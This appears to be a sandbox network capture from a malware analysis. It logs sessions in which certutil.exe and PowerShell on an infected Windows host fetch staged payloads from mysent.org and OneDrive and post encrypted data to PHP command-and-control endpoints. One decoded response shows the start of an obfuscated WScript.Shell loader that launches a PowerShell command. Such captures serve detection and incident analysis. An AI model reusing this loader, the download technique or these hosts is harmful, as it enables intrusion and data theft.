Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.1.81	49218	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:46:49 UTC	87	OUT	GET /access.log.txt HTTP/1.1 Accept: / User-Agent: CertUtil URL Agent Host: mysent.org Cache-Control: no-cache
2018-06-19 11:46:49 UTC	87	IN	HTTP/1.1 200 OK Last-Modified: Mon, 14 May 2018 12:44:21 GMT Content-Type: text/plain Content-Length: 5376 Date: Tue, 19 Jun 2018 11:46:49 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:46:49 UTC	87	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 61 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 0a 61 2e 72 75 6e 28 27 43 4d 44 2e 45 78 45 20 20 20 2f 43 20 20 22 73 65 74 20 20 20 4b 6a 56 3d 20 20 53 65 54 2d 56 61 72 49 41 42 6c 45 20 65 69 50 20 28 20 5b 74 59 50 65 5d 28 22 7b 37 7d 7b 35 7d 7b 31 7d 7b 31 31 7d 7b 30 7d 7b 33 7d 7b 32 7d 7b 36 7d 7b 38 7d 7b 34 7d 7b 31 30 7d 7b 39 7d 7b 31 32 7d 22 20 2d 46 20 5c 27 44 5c 27 2c 5c 27 74 69 6f 4e 5c 27 2c 5c 27 6f 6e 41 72 59 5c 27 2c 5c 27 69 63 74 69 5c 27 2c 5c 27 74 45 5c 27 2c 5c 27 4c 6c 45 43 5c 27 2c 5c 27 5b 53 54 5c 27 2c 5c 27 63 4f 5c 27 2c 5c 27 52 69 6e 47 2c 53 59 53 5c 27 2c 5c 27 4f 42 4a 5c 27 2c 5c 27 4d 2e 5c 27 2c 5c 27 53 2e 47 65 6e Data Ascii: <script>a=new ActiveXObject("WScript.Shell");a.run('CMD.ExE /C "set KjV= SeT-VarIABlE eiP ( [tYPe]("{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}" -F \'D\',\'tioN\',\'onArY\',\'icti\',\'tE\',\'LlEC\',\'[ST\',\'cO\',\'RinG,SYS\',\'OBJ\',\'M.\',\'S.Gen

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.1.81	49223	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:46:52 UTC	92	OUT	GET /modules/default.php HTTP/1.1 Cookie: session=A28CY7CTtyMIsdT0xdubajbuXDs= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org
2018-06-19 11:47:05 UTC	93	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Content-Length: 1275 Date: Tue, 19 Jun 2018 11:47:05 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:47:05 UTC	93	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.1.81	49240	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:47:07 UTC	94	OUT	POST /modules/default.php HTTP/1.1 User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Content-Length: 2830
2018-06-19 11:47:07 UTC	94	OUT	Data Raw: 95 Data Ascii:
2018-06-19 11:47:07 UTC	94	OUT	Data Raw: e3 f9 33 bc 6e f3 cf ab 85 dd 53 4d 7f c7 09 70 b2 86 c5 16 a4 fb f4 3b aa 56 75 81 a6 02 34 8f 1e 6e be 35 17 a8 26 3a 51 c5 1c ac c5 bf f0 d2 9b ee c7 25 28 e9 ae 80 cb ad 42 a6 89 06 41 8e 05 43 21 54 97 22 94 e6 e2 79 a0 cf 4c 0e 1b 5e 23 cc e2 52 c4 c3 ff 1d 81 c3 7b e5 1e 86 08 c6 66 fe 28 74 b4 4c a3 d6 6c 65 58 7f 2e 99 16 d5 70 05 2e 8a 52 bc 7b b4 1c 16 91 49 1d cc bd 8a de 0c 29 47 06 69 c0 0d 1c 76 bf f1 51 f6 23 c0 58 f9 61 37 88 09 03 f7 8f 6c 50 0c 8f 23 54 78 63 13 9f aa 9f 0d c8 b4 6e d5 0c 7a 7d 1f f4 b3 11 b9 20 c9 a6 9c 05 5e 6b 33 6b 8f e9 f4 f3 73 7d 3a 69 27 28 e4 72 a8 6c d2 d0 7e e1 dd eb 18 09 ba 6f 0b ff 73 e9 d8 71 c0 a5 30 7b d2 12 e7 1c ee 22 62 68 b8 d5 f5 9b f3 68 0a e6 e3 67 19 aa 77 9d 88 6a d4 b7 f8 04 1e 04 44 0b f7 b9 Data Ascii: 3nSMp;Vu4n5&:Q%(BAC!T"yL^#R{f(tLleX.p.R{I)GivQ#Xa7lP#Txcnz} ^k3ks}:i'(rl~osq0{"bhhgwjD
2018-06-19 11:47:20 UTC	103	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Tue, 19 Jun 2018 11:47:20 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.1.81	49242	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:47:13 UTC	97	OUT	GET /modules/admin.php HTTP/1.1 Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Connection: Keep-Alive
2018-06-19 11:47:20 UTC	104	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Content-Length: 5397 Date: Tue, 19 Jun 2018 11:47:20 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:47:20 UTC	104	IN	Data Raw: c2 49 b8 30 b4 14 46 3f b0 b9 c6 68 d1 10 d3 b4 03 8c f7 c0 50 3d 8c 44 54 bb d7 f5 18 66 ce 5f a9 69 dd b9 2a 47 40 f2 b0 6c a1 7c 9f f9 3c 45 e3 4d 85 35 82 f0 44 6b 08 0a 94 35 cf 24 40 26 23 39 2a 3f 94 e4 59 33 5e 4d bb d9 63 15 15 11 c1 97 d3 f8 de b7 ca e2 90 a4 e2 31 3c 5d 5f 4e 62 44 2f 9d aa f6 b2 b8 50 57 7b c2 59 63 99 8e 60 74 85 0e 2e 54 14 99 68 85 2e 63 cd 86 36 92 b9 59 c8 fa bb 86 ce 77 7d 90 42 f1 84 ff 43 d5 0b 9e a6 02 0c 08 25 50 ba 33 e9 c8 8e 23 7c bf 72 0d 8d fc a3 c8 c4 bd 9c cf 04 15 06 97 80 b2 36 77 20 69 33 3f 19 74 94 64 15 5a 86 78 88 32 96 2a 53 58 42 66 52 5e ff 5f be 32 5a d1 f6 17 09 b5 28 c5 ae 1b 96 11 b1 1b 16 c0 36 d3 63 3d aa b5 3a dc 57 bc e5 e1 43 29 26 0b 32 66 31 a8 d2 91 62 d4 36 4d c3 d9 b2 1e f1 b3 34 32 d3 Data Ascii: I0F?hP=DTf_iG@l\|<EM5Dk5$@&#9?Y3^Mc1<]_NbD/PW{Yc`t.Th.c6Yw}BC%P3#\|r6w i3?tdZx2*SXBfR^_2Z(6c=:WC)&2f1b6M42

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.1.81	49243	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:47:14 UTC	97	OUT	GET /modules/admin.php HTTP/1.1 Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Connection: Keep-Alive
2018-06-19 11:47:17 UTC	97	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Content-Length: 5396 Date: Tue, 19 Jun 2018 11:47:17 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:47:17 UTC	98	IN	Data Raw: 44 db 7c ca c8 ac 7d 0a b8 e3 e2 4c 31 ab 63 7b ef e5 0d 2d 1f 81 6d f5 9e dc 90 3d dd 79 1b 1c 75 99 1a ee bd ca 4b 8d 5c 11 da c1 b3 7d ce af 38 6d e3 a9 fb 74 2e 19 b4 7f 2e 85 95 6d 4a 59 36 b9 96 e3 26 96 7b 84 46 48 0c df 11 8d 2f 21 1d 80 6d 94 40 36 ee f7 78 f4 34 e6 4c a0 1f a1 5d d1 d6 b0 8c d2 2c 0b 00 73 82 b2 f0 57 66 6d a1 af 89 36 c3 97 64 43 46 80 5b 2d 48 c8 04 47 fa f7 2d d9 6a 28 c7 33 fe 86 9b 0c 29 82 1c c2 bd 42 e9 8a e6 dd 1b 53 2c ae 41 11 02 50 cd c9 05 e5 e2 2b 26 6f 6f b1 31 d5 57 6a c7 69 86 11 1b 17 99 fd fa d7 9b eb 28 64 ff 30 d4 d1 b5 83 78 24 16 8b 5b 7b 75 5a 38 d8 b8 54 cd 2b 0f d0 72 57 4a ed 9e 04 90 f2 ff 9e 35 a4 4f d1 65 99 e8 ff 99 0f 8f 5e 34 58 62 33 a1 73 d4 dd 74 0e 9e d6 f7 bf 72 c5 ab 2a 7a 10 9f 27 58 b0 28 Data Ascii: D\|}L1c{-m=yuK\}8mt..mJY6&{FH/!m@6x4L],sWfm6dCF[-HG-j(3)BS,AP+&oo1Wji(d0x$[{uZ8T+rWJ5Oe^4Xb3str*z'X(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.1.81	49245	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:47:20 UTC	103	OUT	POST /modules/admin.php HTTP/1.1 Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Content-Length: 462
2018-06-19 11:47:20 UTC	103	OUT	Data Raw: f6 Data Ascii:
2018-06-19 11:47:20 UTC	103	OUT	Data Raw: 38 64 08 8a 15 49 34 fe 21 8c 94 d0 c0 42 f7 9b bf fb c4 ef c7 51 8a 85 68 69 4d 88 63 05 49 2c e2 c4 98 8b 80 a6 e0 dd d1 24 34 9d 9d 5a 75 9e cb 64 c0 09 3a 69 ca 5b 25 e3 2e 7a a7 d6 9e 2e 8e bf 0b 9c b3 1e 66 48 ac fa d7 3d 7d 87 6a 38 86 50 ce a3 0a 84 b8 3c 9b 75 84 3c 1e 0b e7 a9 7e e8 c1 c5 b2 5d b6 45 8f 67 26 b5 63 ce 50 d5 98 21 f8 41 0f b4 4a ba 01 1a 2d 6e 9c 11 15 71 4a fa 9d e3 b2 ea 45 b9 d2 3f 7f 9e 71 d0 8f 05 b3 a4 fb 2d 55 f1 4f 9a 20 7f 7a a6 99 ea e7 05 4a a6 11 eb 62 7d da 95 31 76 b1 dc 78 9d 07 4f 1e 8f 4a 7c 8a b2 9b 2a a9 c5 07 3e a2 27 be da 82 24 e0 dc ca c2 08 5c f5 0b 31 a8 5e 74 31 87 9d 4e 22 8b b2 30 c1 28 e9 7c a6 84 95 9d df 74 87 06 f4 44 00 da 2b 41 e7 40 c5 9d 43 88 da dc 56 aa f6 49 03 d7 fa 3b e7 0f d3 91 b2 bb ff Data Ascii: 8dI4!BQhiMcI,$4Zud:i[%.z.fH=}j8P<u<~]Eg&cP!AJ-nqJE?q-UO zJb}1vxOJ\|*>'$\1^t1N"0(\|tD+A@CVI;
2018-06-19 11:47:36 UTC	112	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Content-Length: 256 Date: Tue, 19 Jun 2018 11:47:36 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:47:36 UTC	112	IN	Data Raw: 6c ca fa 77 b4 24 f2 e2 fe 96 e9 e5 f0 79 08 d2 e5 5e 95 a0 46 a5 4e 4d 28 0f 42 79 53 10 19 1b ec 10 dc 59 5f b3 3f ea f0 1f 5b 46 dd 98 15 87 f3 d7 f5 46 e1 5d d2 bd 1b 59 8a 8e 6e 14 62 f0 e5 a9 da 3b 45 bd b8 1d 9c af 93 fa 1e b7 5a 94 b4 68 cb 75 d6 72 27 7a d7 39 13 2d ca a8 80 5b b3 07 cb 11 60 b0 06 40 cc aa 38 d6 3a 06 ac 12 96 03 76 04 2f bc 7b c4 a0 7b 41 7a 11 22 c0 57 07 df 39 9c b1 e7 a7 d9 39 07 45 25 1b 66 ac 24 49 d5 ea 14 12 c3 a6 21 d4 04 7f fd 53 d8 8b 72 2c fa fe a9 50 cc dd f4 f2 3f be bc 52 ec e9 53 75 f2 f2 98 a9 4c c8 44 ca e1 0c 79 91 56 47 ce a8 bb 07 c2 31 85 ae c1 aa 80 fb 6b 73 ce ca 89 96 29 ce 6e 7e c4 ba 8d 10 69 47 8e c4 c5 f0 b4 7c 97 ce d6 95 ed 34 92 fc 06 5e 19 1f b7 41 e5 aa 1d e9 d1 7c ba 7c 57 81 13 ee f5 40 8e 7c Data Ascii: lw$y^FNM(BySY_?[FF]Ynb;EZhur'z9-[`@8:v/{{Az"W99E%f$I!Sr,P?RSuLDyVG1ks)n~iG\|4^A\|\|W@\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.1.81	49247	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:47:21 UTC	109	OUT	GET /modules/main.php HTTP/1.1 Cookie: session=+6QNckPfZ1I1gtw1brM9/Zms3DU= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org
2018-06-19 11:47:34 UTC	110	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Content-Length: 1275 Date: Tue, 19 Jun 2018 11:47:33 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:47:34 UTC	110	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.1.81	49248	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:47:26 UTC	109	OUT	POST /modules/admin.php HTTP/1.1 Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Content-Length: 462
2018-06-19 11:47:26 UTC	110	OUT	Data Raw: 33 Data Ascii: 3
2018-06-19 11:47:26 UTC	110	OUT	Data Raw: a5 a6 00 26 60 95 61 bc 70 da e4 e4 33 6b 32 fc 0b cd fa 73 91 60 2b bf 5d 27 bb 98 83 44 0a b4 aa 10 2f 8f 3c 7c 1b 8a 67 53 13 01 a7 f1 e3 2d 23 da e2 0c c9 1e 55 2f c7 16 fa 46 29 65 3b d5 b5 07 9c 37 95 86 ed b3 0a 99 d4 b9 74 d1 88 18 ad c7 06 26 9e d1 24 22 94 56 91 f6 c6 40 76 e9 22 79 5f 22 52 e9 b0 bb 7e 01 fe a7 f3 08 a3 8e 02 4b d2 5c 32 e3 49 ac 4e 6a 54 b9 c7 1e 38 34 b9 49 82 94 15 11 83 01 a9 6a ed a7 98 67 77 86 92 ef 62 ef 63 2c c6 14 68 7f af 9c e9 fa 7c 10 ce ec 2d 07 c8 70 83 d4 bc c0 81 6e d7 37 42 c9 92 79 69 eb 6b 9f e4 e0 a3 f7 99 81 47 0a b4 96 b5 cb 9e 48 dc ef ff 3c 43 a6 54 c5 79 ff 29 3b b4 cf 9d b2 95 53 21 1f 12 e0 84 3d 45 aa c3 c7 04 72 9d 0f 1c 98 56 0e ad f1 c6 83 eb b9 f5 25 a5 0f 63 a2 40 dd d7 93 4f 33 cb 35 c5 5e 6f Data Ascii: &`ap3k2s`+]'D/<\|gS-#U/F)e;7t&$"V@v"y_"R~K\2INjT84Ijgwbc,h\|-pn7ByikGH<CTy);S!=ErV%c@O35^o

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.81	49164	204.79.197.213	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:45:38 UTC	11	OUT	GET /v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content HTTP/1.1 User-Agent: Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299) Host: api.onedrive.com Connection: Keep-Alive
2018-06-19 11:45:38 UTC	11	IN	HTTP/1.1 302 Found Cache-Control: no-store Via: 1.1 DB3PPF79D50BF68 (wls-colorado) Location: https://dgdadq.dm.files.1drv.com/y4mLDnW_sdiYZdrKuP_hiNnzpiLk2TKmTpCsB8gTSB6nzLeQ5XI6zgdcTjR3JG3Poj0uB4PFybzxs8PnowL5t489i5OJYPLU1pFu0EfBu2R-TNgGUEBJrDX6xp0txVyQUcI1vVcyu6-6Ytt0A_2SLJjd9KGnvOs0gS38Yc972-fShnY6NOZB_GJMLZNHGwfgo2STbA3YPaoscB3eIa7eLbNlA/STAGE0-PS.txt Vary: Accept,Accept-Language,Authorization,Prefer P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-WLSPROXY: DB3PPF79D50BF68 X-MSNSERVER: DM5SCH102230809 Strict-Transport-Security: max-age=31536000; includeSubDomains X-AsmVersion: UNKNOWN; 19.115.603.2010 X-AsmVersion-ProxyApp: UNKNOWN; 19.115.603.2010 X-MSEdge-Ref: Ref A: D8FA0B9D3FEF4538832221CA480ED242 Ref B: AMSEDGE0208 Ref C: 2018-06-19T11:45:38Z Date: Tue, 19 Jun 2018 11:45:37 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.1.81	49249	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:47:37 UTC	112	OUT	POST /modules/main.php HTTP/1.1 Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Content-Length: 206
2018-06-19 11:47:37 UTC	112	OUT	Data Raw: 3b Data Ascii: ;
2018-06-19 11:47:37 UTC	112	OUT	Data Raw: dc 8c 2b 9b e7 f4 d0 b8 0c e9 b7 75 ee f1 6e 05 5e 84 ff a6 6d 61 cd 13 e3 91 64 06 56 b5 9c 20 b8 b6 fc f4 7f 6e 22 5b 53 9e 74 cd 00 e6 f2 85 74 fc e5 f7 69 14 42 7b 91 e6 d7 e5 42 8a 56 6c 9b c7 2f 3f 13 69 44 2b a8 7e 51 17 7c e1 5d 02 61 73 62 85 35 75 c8 2c 19 5e 8e f5 76 28 d5 45 09 59 7f bc e6 09 2f 28 44 a6 56 9b 88 b9 f6 18 c4 5f a4 73 28 23 60 f7 5a b4 24 37 8a cf f4 05 1e ec 1d d3 46 92 f0 78 19 fc 34 2e 03 d3 3a c6 19 4b fb 1b d0 f5 d7 19 c2 f4 81 01 15 4b 0a 75 52 49 ee 64 c8 29 fb 3b ee b3 a0 61 44 69 22 01 b1 f6 ee 21 30 25 82 be 96 18 ea 2d 65 1e 14 a2 81 0a fb a5 84 9a d0 3c 3b 37 25 64 89 Data Ascii: +un^madV n"[SttiB{BVl/?iD+~Q\|]asb5u,^v(EY/(DV_s(#`Z$7Fx4.:KKuRId);aDi"!0%-e<;7%d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.1.81	49165	131.253.33.213	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:45:39 UTC	12	OUT	GET /y4mLDnW_sdiYZdrKuP_hiNnzpiLk2TKmTpCsB8gTSB6nzLeQ5XI6zgdcTjR3JG3Poj0uB4PFybzxs8PnowL5t489i5OJYPLU1pFu0EfBu2R-TNgGUEBJrDX6xp0txVyQUcI1vVcyu6-6Ytt0A_2SLJjd9KGnvOs0gS38Yc972-fShnY6NOZB_GJMLZNHGwfgo2STbA3YPaoscB3eIa7eLbNlA/STAGE0-PS.txt HTTP/1.1 User-Agent: Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299) Host: dgdadq.dm.files.1drv.com Connection: Keep-Alive
2018-06-19 11:45:39 UTC	12	IN	HTTP/1.1 200 OK Cache-Control: public Content-Length: 7293 Content-Type: text/plain Content-Location: https://dgdadq.dm.files.1drv.com/y4mVzbqwRuj1C7DKiYnOrp-73Jp9DKjpCqzrMtj97lJqJqe60hkQd1iNG47CEm9yn-zUjQmjWZ1BYkVKnf8lzf1eDEgy6EgatObPSBNFpyrsfip0EeP4c2BwD_XUqXFzVZ8rluSNP1mp8k49xwOyf_V4T_gEI9YXDMVCO0LERBiJxZlKIiLli7QQE7e52oaGaQGU7s--MGGy9JJ0FmqlD38Mw Expires: Mon, 17 Sep 2018 11:45:39 GMT Last-Modified: Wed, 16 May 2018 07:36:53 GMT Accept-Ranges: bytes ETag: aNzNGRTlDQkIyMTVEM0VCMiExMDkuMjM2 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-MSNSERVER: DM5SCH103162021 Strict-Transport-Security: max-age=31536000; includeSubDomains X-SqlDataOrigin: S CTag: aYzo3M0ZFOUNCQjIxNUQzRUIyITEwOS4zNzY X-PreAuthInfo: rv;poba; Content-Disposition: attachment; filename="STAGE0-PS.txt" X-Content-Type-Options: nosniff X-StreamOrigin: X X-AsmVersion: UNKNOWN; 19.115.603.2010 X-MSEdge-Ref: Ref A: 24452EDD515A4758A8C0416C96AC7378 Ref B: AMS04EDGE1017 Ref C: 2018-06-19T11:45:39Z Date: Tue, 19 Jun 2018 11:45:39 GMT Connection: close
2018-06-19 11:45:39 UTC	13	IN	Data Raw: aa 77 7e 0b 22 6d d3 4b 6c cf 76 30 42 5f 23 88 8b 8a de 7f 8b 45 68 ca d9 c6 d4 cd 2f ed d1 0d 96 3f 66 c7 a9 aa 9f 29 91 bd 0b f9 58 ce c3 a9 56 71 5f 3a 72 12 91 be b7 98 0c cc e8 5b 74 88 34 b2 79 56 b0 fe c3 3e 60 2e 0d a2 b3 cb 5b 85 05 ec 3f 8c 0e 94 7c 39 b1 12 18 7c f8 98 22 0f 3d 99 9b d7 5d e8 5a 66 a9 53 a9 40 af c6 0a a4 8a fe f8 d8 6c ec b5 00 c3 c1 00 9d e8 08 cd 85 73 13 61 84 68 4d a5 69 c7 b8 c9 f8 6d 69 16 83 89 5d 70 0b a6 41 70 87 3d 42 b8 e7 f2 85 b0 13 48 ed 0c d0 ec 87 04 1f c0 82 12 26 50 36 b1 17 54 3c 6f 9d fe 08 3d 58 ea 30 e9 fb e1 c2 0e ee 70 85 0a e3 0e 39 dd f5 00 c7 23 59 4f dc f3 2d 50 93 f1 4f e1 fc f4 8d 47 27 0c bc 65 d3 b2 59 c5 74 3a 39 4d e9 78 32 3e a8 3e 29 c6 7b 5b f9 e1 08 f4 4b 21 43 46 10 44 3c b4 82 cf 36 e2 Data Ascii: w~"mKlv0B_#Eh/?f)XVq_:r[t4yV>`.[?\|9\|"=]ZfS@lsahMimi]pAp=BH&P6T<o=X0p9#YO-POG'eYt:9Mx2>>){[K!CFD<6
2018-06-19 11:45:40 UTC	14	IN	Data Raw: f6 85 34 e7 f9 b0 49 18 e1 3f 68 03 05 45 13 32 5e de 42 32 9b 9a ed 3e 82 1a 2f 0f 18 09 d6 33 20 15 e0 b3 d4 89 c1 10 72 a8 1a 24 90 39 20 66 d0 e7 fe 0e 35 da ab 49 4d 25 d4 a6 fb 81 a7 f0 d4 8f 03 df 89 c7 0d ba 2a f2 7b 90 eb 4c f7 5a a2 4c 11 72 c8 38 25 34 93 41 51 0f 1c 0a 1b a1 d0 00 1f 7c c5 16 7e 6b de ea 06 4f dc 7d af 09 8d 43 b8 75 e3 a0 7e f4 83 99 5e 73 00 68 97 57 49 3a 62 8d 97 5f 57 14 85 5c 41 1c a7 50 ea 5f bf a6 80 c6 bf c6 cb 90 dd cf 52 08 60 69 54 f3 ad 26 d4 9a a2 f8 58 b3 6e 19 3e 17 94 d3 25 fd af a5 d2 02 fc 77 26 30 cb 2e fd 76 73 09 9f d8 81 b8 35 46 05 89 d7 40 42 3a 87 37 a8 27 c5 e2 f5 5c 13 58 a4 23 ad fb 82 91 88 b1 7a 04 63 67 b1 01 e6 95 03 06 76 a1 37 06 72 27 87 7b 5f ee 06 72 00 82 69 0b 12 16 f2 70 80 74 01 c9 13 Data Ascii: 4I?hE2^B2>/3 r$9 f5IM%*{LZLr8%4AQ\|~kO}Cu~^shWI:b_W\AP_R`iT&Xn>%w&0.vs5F@B:7'\X#zcgv7r'{_ript

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.1.81	49169	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:45:47 UTC	20	OUT	GET /modules/admin.php HTTP/1.1 Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Connection: Keep-Alive
2018-06-19 11:45:52 UTC	21	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Content-Length: 5399 Date: Tue, 19 Jun 2018 11:45:52 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
